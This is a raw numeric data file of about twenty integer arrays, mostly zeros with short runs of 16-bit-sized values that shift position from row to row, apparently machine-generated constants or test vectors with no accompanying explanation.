[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 34880, 29712, 54916, 52545, 61158, 23558, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 8192, 2048, 16896, 41088, 50208, 25096, 18242, 2069],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 22592, 15376, 15748, 58433, 23526, 55558, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 28672, 23552, 63232, 5568, 1904, 30044, 9975, 50044],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 10304, 1040, 42116, 64321, 51430, 22022, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 256, 2112, 47120, 27311],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 63552, 52240, 2948, 4673, 13798, 54022, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 53248, 62464, 23808, 40768, 64976, 5620, 30557, 29854],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 51264, 37904, 29316, 10561, 41702, 20486, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 57344, 47104, 60928, 11136, 36576, 35512, 30190, 16121],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 38976, 23568, 55684, 16449, 4070, 52486, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 12288, 52224, 4864, 15552, 55600, 22476, 32275, 17712],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 26688, 9232, 16516, 22337, 31974, 18950, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 28672, 23552, 30464, 9664, 6000, 23644, 25459],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 14400, 60432, 42884, 28225, 59878, 50950, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 36864, 58368, 39168, 20032, 45456, 32996, 7321, 5554],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 2112, 46096, 3716, 34113, 22246, 17414, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 40960, 26624, 55808, 18048, 48544, 60520, 19162, 25245],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 55360, 31760, 30084, 40001, 50150, 49414, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 61440, 15360, 28416, 13248, 57072, 10044, 34927, 58020],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 43072, 17424, 56452, 45889, 12518, 15878, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 40960, 59392, 31232, 36480, 55200, 1256, 4855],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 30784, 3088, 17284, 51777, 40422, 47878, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 20480, 54272, 5376, 19776, 63824, 45268, 43797, 58502],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 18496, 54288, 43652, 57665, 2790, 14342, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 24576, 6144, 1536, 61824, 4192, 46872, 4614, 14081],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 6208, 39952, 4484, 63553, 30694, 46342, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 45056, 44032, 2816, 64192, 55472, 54188, 33291, 45016],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 59456, 25616, 30852, 3905, 58598, 12806, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 53248, 46080, 36096, 64320, 63696, 40372, 7483],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 47168, 11280, 57220, 9793, 20966, 44806, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 50176, 53504, 40000, 38160, 5572, 32465, 21786],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 34880, 62480, 18052, 15681, 48870, 11270, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 8192, 51200, 29184, 11392, 18208, 6856, 22386, 16421],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 22592, 48144, 44420, 21569, 11238, 43270, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 28672, 7168, 59136, 37312, 34416, 19740, 59111, 32972],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 10304, 33808, 5252, 27457, 39142, 9734, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 45056, 11264, 11008, 21184, 58943],
